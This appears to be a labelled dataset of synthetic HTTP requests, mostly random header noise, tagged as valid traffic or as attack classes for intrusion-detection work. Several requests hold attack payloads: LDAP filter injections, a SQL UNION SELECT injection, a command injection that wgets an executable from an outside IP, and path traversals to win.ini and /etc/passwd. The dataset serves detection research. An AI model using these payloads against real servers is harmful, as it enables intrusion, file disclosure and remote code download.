Date: Sun, 22 Feb 09 21:10:00 CET
ETag: "46otc4gaem@5wyzm"
If-Modified-Since: Thu, 08 Jul 04 04:58:56 GMT
If-Match: "j48wcPEsrnVYazgzaH91"
Referer: /n4gte/iEth.txt
TE: deflate;q=0.9,trailers,gzip
User-Agent: hmueoejs5oiztT2
UA-CPU: StrongARM

null

End - Id: 36185
Start - Id: 38203
class: LdapInjection
GET /tjjh5Npo6/aosatL/7kwasi/DEAnFgRdiv4@KUP/u5a7asitiebceafA.aspx?uca5anCsqre=%3Atjam0+stdinl4%5Bthtte&kbqq88efEbb=0Uftt&sn=aMpT&efgeh=ha5shmetan+rohrotayioO%27&hs=%29%28+++%7C++%28l4iU%3Dac*%29&pB6KiUBV7dXq=zSh1Uao%2Bfi%40sRna&group by8KljQwjVE0=oi.R&ocsE=878762194&tehica=+raoe&hsetc=28&mYMs=ihVf3BrQ4aZ.&asm5hq=yad&wehe9H2r3=75928441&snl=dft HTTP/1.0
Host: 140.116.29.229
Connection: eeTNRth
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dsbivi-he7t
Cache-Control: min-fresh=5
Client-ip: 9.211.101.123
Cookie: 6wq=j;wdtejsttr=oEsc9A;etnjsiasit8oca=oCSC_ewp
Cookie2: $Version="3"
Date: Sat, 22 May 04 04:37:57 GMT
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Wed, 08 Sep 04 22:27:57 GMT
If-Unmodified-Since: Fri, 06 Jul 07 20:26:44 UTC
If-Match: "UbZneqKfi8XP9Ar6"
If-None-Match: *
If-Range: *
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Basic c3NzaWk6ZU5kZQ==
Range: 143609-2,-687,75-
Referer: /pest/lwnv.exe
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Warning
User-Agent: 3G70ghPC0s http://www.usrue0.uk
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 321x2267
Via: 8.1 123.177.211.141, 9.7 142.211.220.112:3, FTP/0.1 169.49.77.134
Transfer-Encoding: YmnYt
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38203
Start - Id: 35316
class: SqlInjection
GET /nwniEot/temois6rnespdrvo/dt3eiryEeva/dUwbBG19tDQQn67HF3io/g1gz/SeP/gOVWvjX.nsf?dge7cE=oRZ-&r4yeoithctscr=n96Slsdhueers9&iedmwtre6y2=%27++++%29+++UNION+++++ALL+++++SELECT++++7%2C355%2C7%2C2%2C5+++++FROM+++++m8+WHERE+++++%28+++%27%27%3D++%27&eBecFaoeejinmht=6943&womltrDOoTtrw=nij HTTP/1.1
Host: www.rraip.org
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, iso-8859-9;q=0.7, windows-1258, cp-950
Accept-Encoding: 
Accept-Language: nz-NEfws7er
Cache-Control: no-cache
Client-ip: 245.178.69.254
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="92"
Date: Sat, 09 Sep 06 02:03:28 UTC
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: kI3zct@drabH.cz
If-Modified-Since: Wed, 09 Dec 09 17:46:55 CET
If-Unmodified-Since: Wed, 30 Jun 04 20:46:46 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 23 May 08 15:56:44 UTC
Max-Forwards: 09
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Digest opaque="oyte"
Range: 9898-,30840-71
Referer: /aetOS/aNreaa/F2aofuu/efSiw.htm
TE: trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/0.7 (X11; U; Linux i586 7.8; 7u-1h; rv:1.4.1) Gecko/89494950
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: 7.7 www.Rsmnlni.html, 5.8 www.wdteuN.png
Transfer-Encoding: identity
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35316
Start - Id: 28904
class: Valid
GET /fo38q/m865ns2Xk9pEaDYMYk/qq56wp-uAmsbetweenscriptDV/omR2pxHYnx1I1M6/_.7/s4neh/iuZv3wSi7z_e/RCtmpGocgXL.asmx? HTTP/1.1
Host: 76.70.133.107
Connection: keep-alive
Accept: image/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fneoto-o, sh-ncspdsou, hsrk-d
Cache-Control: no-cache
Client-ip: 35.251.112.175
Cookie: tAst=2tmifnnfemfY;sarrRearf=ntt;ventgois=Lrsdsiazoatgumae;srNgd=636178;BlBWIsFbdcmE=8Aipn
Cookie2: $Version="963"
Date: Sat, 27 Mar 10 04:58:49 CET
ETag: W/"6kJzAzy5z_apNO5"
Expect: 100-continue
From: trrfyie@htyofoaez.ch
If-Modified-Since: Sun, 07 Dec 08 03:43:49 UTC
If-Unmodified-Since: Wed, 14 Jul 04 11:12:53 CET
If-Match: "2JQAzCy_cUbf0-CA8"
If-None-Match: "sVlfOlPp6h@loBIV"
If-Range: "WnPnoTGk@VWfxakl"
Max-Forwards: 627
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/qjEaKd.asp
Authorization: fxp6e artNtfcu=iayi
Range: 492-,-067,215329-8229
Referer: http://inhedii.uk/aslily/0n2h/esf9ehk.conf
TE: gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: RetellTJye (nA2TDfbRne)
UA-CPU: StrongARM
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 218x9813
Via: HTTP/0.2 www.elee.css:51
Transfer-Encoding: compress
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 724 www.ei3iee94.css:2 "n9feptaf" "Sat, 15 Apr 06 01:19:38 CET"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 2568531119908025423
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28904
Start - Id: 19713
class: Valid
GET /VchildLpQLZ1lLV/tN1ElE0os/v7qQb9b/osnmaoeCh/9DasadiefhasoeIbaw/netlswacwqeiwrsPur3E/odhJd92/cwb_moFRx/8srdxeawlLTo.asp?hOtstah=jhSa&nslAeoeOdden5=op3%3Erepe%3F%3Epoo+e+cg&oedlalxnt=ns5cnxe%29ilrt8tgg&GcnSagaJerc=t%7CnH&too=ag&tmasn2zteeauI=38&5tbat=2n&u8z=74348314&iai=451&zrl=wkJu-QkJmuS HTTP/1.0
Host: 49.88.70.138
Connection: keep-alive
Accept: image/*, video/quicktime;q=0.5
Accept-Charset: x-mac-icelandic;q=0.4, x-mac-chinesesimp, x-mac-chinesetrad;q=0.8
Accept-Encoding: identity, identity, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 98.156.228.178
Cookie: Tid7rvr=763;ieoodBkpteu2rOo=eEqiBu;kzntqcnsoeri=77289
Cookie2: $Version="61"
Date: Thu, 14 Sep 06 19:10:01 CET
ETag: W/"Rkb98hahz3bFd92n3c"
Expect: rnDg5eee
From: moea@estmzx.uk
If-Modified-Since: Mon, 06 Jul 09 02:37:28 GMT
If-Unmodified-Since: Fri, 30 Oct 09 07:14:34 UTC
If-Match: "Nqab3YUS-jgHzjyFAP"
If-None-Match: *
If-Range: "9Cqx.W8g6h4eS9Jn"
Max-Forwards: 25
MIME-Version: 5.3
Pragma: tn1=bpgWR
Proxy-Authorization: Digest nc=44bDedBC
Authorization: Digest opaque="Ysale4Dk"
Range: 71657-893
Referer: http://www.ar1i.be/bfcsth/E50n/hslDtehe/Tsutce/alnh.sh
TE: trailers,deflate;q=0.5,trailers
Trailer: Date
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 4.3; Tx-Ar; rv:9.5.1) Gecko/84791377
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 428x5679
Via: HTTP/5.8 69.132.95.155
Transfer-Encoding: rJc3L
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 7592797493312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19713
Start - Id: 38122
class: LdapInjection
GET /ajCV/03ilddgt/logjfBnodeb81UWt/tbttbco6azape9.css?bfoB=sxoet%29%28%26%28objectClass%3D++++etNs*%29 HTTP/1.1
Host: www.3Luost.st
Connection: scosvAdd
Accept: application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, compress;q=0.6, identity;q=0.4, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 76.39.81.250
Cookie: tpswnytchwotN=1isdf;3rpeuh5slsht=51608
Cookie2: $Version="2"
Date: Wed, 16 May 07 12:49:35 UTC
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Wed, 09 Sep 09 02:25:42 GMT
If-Unmodified-Since: Fri, 31 Mar 06 07:11:04 CET
If-Match: "vIbaxHQqUtZ1XmV03qxq"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.1
Pragma: sH='srti0'
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: /oaOt/nsvmts/nsmrEEH/a9ljdThl/nedn.jpg
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/2.3 (Windows; U; WinNT 7.6; tl-be; rv:0.4.2) Gecko/23275302
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 846x668
Via: 3.4 www.tldoTlna.jpg, HTTP/4.6 133.110.171.24
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38122
Start - Id: 11344
class: Valid
GET /z@MxBWXrJY@KqX/e0YBfaspPdtxjvZJjdU/B@6DO8qVVCYGphpmeta.css? HTTP/1.0
Host: 102.199.149.199
Connection: heirese
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, identity;q=0.8, identity;q=0.1, gzip, compress;q=0.9
Accept-Language: hnq7xm-n6, 9fuc-nn9cer;q=0.9, tsixnlt-5a;q=0.9, esle-aih, adfohro-sU
Cache-Control: no-store
Client-ip: 60.163.101.113
Cookie: Osirt7tpR=ruwjaXxj;t0-wechobin=f;9haeIaer;a09co=w9wtranhaE
Cookie2: $Version="7"
Date: Sat, 28 Oct 06 08:20:45 CET
ETag: "n@UUjk1hT0wrlGe8bKt"
Expect: 100-continue
From: ctiZoauS@st4hnahd.ch
If-Modified-Since: Fri, 17 Aug 07 11:11:13 GMT
If-Unmodified-Since: Fri, 25 Sep 09 10:17:44 CET
If-Match: "wuzIkZJ5E1R2zAD"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.1
Pragma: osBnh='Ss'
Proxy-Authorization: e5muqN iuhhcsn=Srln
Authorization: NTLM dWlrbmFuaWljZWlxaHBEcmV6YTNyc29sbjFudGVkQWVlZHFlZmxoaWFiYXJ3ZW9l
Range: 6-34954,-39546,23644-
Referer: http://iBfgLze.fr/alexWw/upSedxhw.txt
TE: chunked,chunked;q=0.5
Trailer: Accept
User-Agent: Mozilla/9.4 (Windows; U; Win98 0.1; ad-lB; rv:4.7.3) Gecko/69558299
UA-CPU: x86
UA-Disp: 139,6791,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 953x845
Via: 6.6 www.tfssn.shtml
Transfer-Encoding: compress
Upgrade: n4e/8.5
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 7492268797432274
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11344
Start - Id: 36816
class: OsCommanding
GET /rr7b/sVPucIxn/692%uVxconnectY1/uBCfv_E.jsp?xaiaehnthiyo=r7%40o&teordyo=%5Cnwget++++http%3A%2F%2F177.144.241.188%3A0973%2Fnftp.exe&fTgHaMlerlVe6=wDDf%40v-0o&wooc=43802 HTTP/1.0
Host: 219.48.136.196
Connection: keep-alive
Accept: video/mpeg, image/*;q=0.4, application/postscript
Accept-Charset: iso-8859-8
Accept-Encoding: gzip, identity;q=0.6, deflate, deflate
Accept-Language: 1anr10ef-tL0cw;q=0.0, gdct-Co;q=0.3
Cache-Control: no-store
Client-ip: 72.115.188.239
Cookie: oajB=i78sPVBW
Cookie2: $Version="089"
Date: Wed, 02 Feb 05 18:23:40 GMT
ETag: W/"xrA-MA9iPPdOjdqpDkPw"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Fri, 01 Jan 10 21:16:01 GMT
If-Unmodified-Since: Tue, 08 Mar 05 02:05:43 GMT
If-Match: *
If-None-Match: "RaltjK@xMn4WSkdVqfGM"
If-Range: *
Max-Forwards: 0501
MIME-Version: 2.5
Pragma: en=h
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: http://hrcoe.gov/r7reR9/rtaal/tdauloo/ets3/les5.asmx
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: Mozilla/7.3 (compatible; Konqueror/9.6; Open BSD i386; 8ita; amintyy; k0Tthveo4o)
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 6983x833
Via: HTTP/0.6 www.kSez9se.tiff:0881
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 563 140.29.225.75 "tidisFr" "Fri, 10 Sep 04 18:53:07 GMT"
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36816
Start - Id: 384
class: Valid
GET /TwCciadhsao4crzelfj/tUW/n8wsmwv/lt3tohAnfhg/xh6zJvJaP/rlysogagss8tsrB/ac0eaTn8ne9n2n/xtv9nnm9T7emf44/rtotvsaksth4rtN/rarexTvfmlarRrai.php4?ceesmoarel=grcc&osh=Ed&ipigaldedtMeEh=eoaf8y3eeixsrseh3&Aoheh=hhyee%3Dlnnam%25e&tShna=is4rT%5C%3BpE+Xc%26xw&tirdap=S%3Edur42o%5CAertm+q5vxterme&ytNppvhhhuoZ3rh=ej6p-&ntupprnnM5iucj=oetmrtrl5gd&tvrh7fnc=0g%40h9E_&msiot2eratUeE=12067602&GZ2FMkMlinka=hf- HTTP/1.1
Host: www.thU7z.gov
Connection: 4ettwtd
Accept: */*
Accept-Charset: iso-8859-3;q=0.0, windows-1255;q=0.2, utf-7;q=0.9, iso-8859-5;q=0.4, windows-1255
Accept-Encoding: compress, compress;q=0.7
Accept-Language: *;q=0.0
Cache-Control: min-fresh=52
Client-ip: 240.98.159.13
Cookie: imisc=ou: nullstrT;ampencremokt6u=shdoo;frrinVtoi=679080;amowroy3alsntf=097445294
Cookie2: $Version="837"
Date: Tue, 27 May 08 16:55:27 CET
ETag: W/"qN046fEpv6REy5KApOF"
Expect: caxlro
From: DbbWly@nefyhddm.ch
If-Modified-Since: Sat, 23 Aug 08 03:18:01 GMT
If-Unmodified-Since: Fri, 26 Nov 04 04:50:43 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Nov 07 12:45:58 CET
Max-Forwards: 258
MIME-Version: 0.4
Pragma: dnWfpetp=ouS
Proxy-Authorization: Digest response="43159A96AD0EB5Fcb964DBa3FAfC0cE0"
Authorization: NTLM aWludjNrcklGZWJocndTZm5kQmV6eVdzTWhsZDNlZWlpam90YWV3
Range: 541443-68,844-,77-861439
Referer: /egqihumi.nsf
TE: gzip,trailers
Trailer: Range
User-Agent: aaouea (lAZMIS; n1pnjy; lXDms.Hzw; yoPnXytXEj; at@B0r1Ti)
UA-CPU: x86
UA-Disp: 8170,9079,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 302x8393
Via: FTP/9.9 www.e1os.htm, eio/5.4 www.ccsm.png, FTP/9.1 92.246.108.118:04097
Transfer-Encoding: ysxr
Upgrade: tohb/5.5, wosd/8.3, a7t/8.4
Warning: 159 42.239.12.186 "nsoeeo" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 384
Start - Id: 27979
class: Valid
GET /x5Ww@.49/hh4ttlxae/tv8cSEiD-/rst@shHyiAodPQM7uF/Aq6sock_streamprocessing-instructionV/11cb0dE._Y3c/a.TDUquELI/yitcmvo/@pA.H8U6telnetNx0a_61/o6xW/t-pSB1/hcbkw.shtml?wasb9cY=ooxp_t&8clt=uhesstGet2a+&atSnt0TPiOe8tga=cidtmp&i4jtecgot=896&uo=alsaor7e&e9=0nncropensereb&Ntrjn=IEn%29a&ctamc9tbourEP=Rf8nq&ortS=slg&oiiyl=nRkgxxGQjFX&Db5essqs=c%27+%3D-%26uoyto&eEaRZ0ClogpXY=573968&.Bv0gkbWf=46&sgyemu7ua=niVtNhht2myedt6is HTTP/1.0
Host: 134.154.77.237
Connection: close
Accept: application/*;q=0.1, audio/*;q=0.6, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: htoam-stjtea
Cache-Control: no-store
Client-ip: 236.19.47.127
Cookie: 10adeletetg=3;aifbjtrha=ereplace?ct8cr;lvrnttAye20t=r0a=AXf78r2hig
Cookie2: $Version="28"
Date: Fri, 22 May 09 02:27:41 UTC
ETag: "U-ZT.5xfVBto0SqZShW"
Expect: SmTsaelu=ibiwsvEe
From: cdnx2t@ottOry6.gov
If-Modified-Since: Fri, 24 Aug 07 12:30:18 GMT
If-Unmodified-Since: Tue, 12 Feb 08 07:16:07 GMT
If-Match: "jJ88iVj5gGc51c7aT2Kq"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest username="eAeuolls"
Authorization: snltht tieei=fsuN
Range: 31980-045
Referer: http://neenu.com/myirae.php
TE: trailers,deflate,gzip;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 1.3; ar-gE; rv:7.5.5) Gecko/17486580
UA-CPU: StrongARM
UA-Disp: 629,775,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5151x4689
Via: 0.1 www.ngtuut2.css, 2.9 65.145.108.240, 4.1 www.fciil7.jpeg
Transfer-Encoding: compress
Upgrade: 5Dytss/2.7
Warning: 671 48.203.149.26 "rmvl3awwnmS" "Sat, 03 Mar 07 11:00:52 UTC"
X-Forwarded-For: 54.46.58.97
X-Serial-Number: 74914
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27979
Start - Id: 45083
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 178.121.91.124
Connection: keep-alive
Accept: image/jpeg;q=0.9, application/zip;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity;q=0.6, compress;q=0.6
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 11.179.164.13
Cookie: evl4bir=42314;Ef0rj=oe7arWFhr7tse8;tckllelebd=455904
Cookie2: $Version="865"
Date: Fri, 16 Jan 09 07:26:48 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: 100-continue
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 486
MIME-Version: 9.2
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: NTLM ZWZzcGhlU3JhdGRXb2hyb3R0a3RybHpQaWVydGRpdXRkZW8=
Range: 51016-,-10087
Referer: /inHsh/nrwidtl.mp3
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 4.8; ne-oM; rv:8.9.0) Gecko/97236042
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 003x764
Via: FTP/7.9 www.mRxmnsan.js, 3.1 www.6ordyRs.gif:8362, tn90et/0.7 www.3get.html
Transfer-Encoding: compress
Upgrade: tTRadh/8.4, hsrdna/9.0, cgtlfu/8.3
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 324503957971792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45083
Start - Id: 6676
class: Valid
POST /eafeu/Nyi/ojW97l3ULklW/rRe-506/rasWn.gif? HTTP/1.1
Content-Length: 113
Content-Language: rlbHmt,52
Content-Encoding: identity
Content-Location: http://l3rl.biz/iefeou/nhmu/hhois5ah.jpg
Content-MD5: dG0yZWVsYWllVnRlaHB0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Jun 08 08:37:31 CET
Last-Modified: Tue, 12 Jun 07 23:01:09 GMT
Host: www.igitt.de:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=00
Client-ip: 3.121.174.35
Cookie: Aoxterm3Ydiv=5
Cookie2: $Version="165"
Date: Sun, 12 Dec 04 06:24:02 GMT
ETag: "vYsxOSquYPtEQpUW"
Expect: 100-continue
From: R5anodt@eiRwb.com
If-Modified-Since: Fri, 01 Dec 06 12:02:36 GMT
If-Unmodified-Since: Sun, 29 Aug 04 16:19:29 UTC
If-Match: "uIoGHtnTU3F2s6w"
If-None-Match: "PadfirSYfyyYUnANxJS"
If-Range: Sat, 14 Oct 06 20:45:50 UTC
Max-Forwards: 5
MIME-Version: 9.9
Pragma: bwtyh='nos'
Proxy-Authorization: Basic NG1kanBpOmllSGVocmVp
Authorization: Basic Z3FlcjpFdWF0bG4=
Range: -70
Referer: /oLsftlc.tiff
TE: trailers,trailers,deflate;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 8.3; jk-mr; rv:4.4.9) Gecko/40527903
UA-CPU: Sparc
UA-Disp: 6078,616,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 075x397
Via: HTTP/0.3 108.37.150.255, HTTP/6.5 227.110.205.58
Transfer-Encoding: deflate
Upgrade: ouir/8.6, le8mS/3.9, uip/7.9, oinia/7.0, igMoc/1.2
Warning: 713 www.8inlfdnc.js "eao0a8Dsgeo" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gurkAG= 2?s&dexecxNS=1&noexda=xmljrhar8&emce=y&epiifo=254&4RDIr=41382222&4oyjfndto=ieitra3gefsts&y1mrkwosr3o=rE

End - Id: 6676
Start - Id: 820
class: Valid
GET /g3n1tY/pQSlPhyq.jTi3.msf?eelcg=1746797&nra7khs=nrnf+edsystemrlho%3C6aRu%40&Md=e08&qss=nn6ttr&uedxteoepl=eNaohetd3iodetn&ysinkcoaiwo5=1&9eI4blgetfn=8673003&ctei=lpwmh&hh=66 HTTP/1.0
Host: 42.18.95.62:3
Connection: keep-alive
Accept: image/gif, image/png, image/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 97.242.61.48
Cookie: zhaqdteFeenh24= exiweab;dvhmcndeftc=24326571;e0ZOrcyjcIhen=v5Qt4siturbt;liroebGvre=6839194
Cookie2: $Version="56"
Date: Tue, 27 Oct 09 09:03:54 UTC
ETag: "P@SVbqfWk7mvrnToa.f"
Expect: 100-continue
From: otea@mcanstwra.de
If-Modified-Since: Fri, 17 Oct 08 07:12:37 UTC
If-Unmodified-Since: Fri, 03 Nov 06 02:43:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 477
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM czY0bW9zY3NlZ29wbXB0enRkZVJnYnNYbUtpMGlzbnZu
Authorization: Digest username="y5ce"
Range: -5014,811909-578591
Referer: /eeicenr.mpg
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.5 (compatible; Konqueror/0.1; Open BSD i386; nNfdsebT; bmiksn)
UA-CPU: MIPS
UA-Disp: 6891,5982,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9683x567
Via: 6.4 www.rclet.jpg, HTTP/2.9 www.tninhbpp.jpg
Transfer-Encoding: identity
Upgrade: almoet/4.8, agnifh/3.7, kiSch/4.1
Warning: 424 www.o4ylbeo1.html "eOaoepcehwUc" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 820
Start - Id: 9497
class: Valid
GET /f3/aRe9cmte5iwrhsEH/osdqhlktb6siu.cgi?euoi1ndnulqt=202&xoiyhtunsEdlst=dasbodyPhqi+ry+piN%27+%5Bo&lexii=oyl%7C1%3Bha5&yyfje5tnllG=1El&form3p6cI=tcneegeaei2i&dycfaalHi=603219566&attjeih=sVvN6Zf&ewbNtyeeD4neuos=8&altwelydshns=13254577&h1m=4340237&tfnkOhyltcne=e9PRtfVX4tAM&qcWTpiq=aH.&nhdetlqcelu=b4enSrdvizse&pHhweo9a=24693&ssjdbeyn5asrar=xNs%29eivtmetaift HTTP/1.1
Host: www.eale0.org
Connection: close
Accept: audio/basic, text/html
Accept-Charset: iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 227.196.111.140
Cookie: 2t2so=s;o<Hrpga+;gIFqAVS4O=hspigaereo;CRONNlZbinz33=ehthpai;eotsc6=sf;nph-hR535m@x=4632381
Cookie2: $Version="5"
Date: Thu, 03 Jan 08 12:39:50 CET
ETag: "k8IqJld@uYhepU6"
Expect: srha=5OPde;hhnoo
From: toRamt@wsu3nR.fr
If-Modified-Since: Mon, 15 Jun 09 16:27:57 GMT
If-Unmodified-Since: Fri, 14 Sep 07 13:06:27 UTC
If-Match: "5NK0mowQfjfXJ6JIx"
If-None-Match: *
If-Range: "V1@NXtXyy1WOWgbVrG"
Max-Forwards: 38
MIME-Version: 2.6
Pragma: 8fea916='sq'
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: Digest nonce
Range: 870431-,61-,-3837
Referer: /rswauq/775mAib.txt
TE: trailers
Trailer: Referer
User-Agent: h3xF-QKy http://www.u4iasI.it
UA-CPU: PowerPC
UA-Disp: 067,164,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: ibiiae/4.7 92.36.208.92
Transfer-Encoding: deflate
Upgrade: h88Sh/4.8, eSn/9.6, 2deieO/8.5, ncfiM/6.2
Warning: 098 24.253.203.103:690 "yeiytiSmccyiashaai" "Sun, 20 Mar 05 12:20:44 GMT"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 5599119283941663287
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9497
Start - Id: 46058
class: PathTransversal
GET /iNiEy/kUqBcY4d/ws4gYrN9Eo2bgsoundw/hweaG@vig2s9.shtml?i6bnspu=r&2positionJN7document5openCRdropR=nNfsnco5A&eMrvzEagxgiad3=eSIaeii&mis=ahrzol0dxunode&ustPosec=1481&.E99Eposition=55278&edhs2h8ncr=j84M HTTP/1.1
Host: www.la23h1.it:892
Connection: HaELs7r
Accept-Charset: x-mac-korean;q=0.2, x-mac-arabic;q=0.2
Accept-Encoding: compress;q=0.5
Accept-Language: tOEui-aiiH27pa;q=0.6, ndioWG-cjeao, rYeksRn-persoInt;q=0.0, b-eeq;q=0.3, i8etgna2-oc
Cookie: eotieeEkatm=tYaeG637;crosatiZSontby=xmocha t11u6mo(eom;tvmirdiduFT=iesaands4go;ak=9;ad=../../../../../../../../../etc/passwd
Cookie2: $Version="7"
Date: Thu, 04 Nov 04 08:51:14 CET
Expect: 100-continue
If-Match: "BMwmY8FRi3U8Sof1gjU"
Max-Forwards: 361
Pragma: no-cache
Referer: http://www.nwe0ot6t.biz/4y6haret/aeur/iIznoe.png
User-Agent: Mozilla/0.4 (X11; U; SunOS sun4u 4.2; sh-Gl; rv:0.7.9) Gecko/26599105
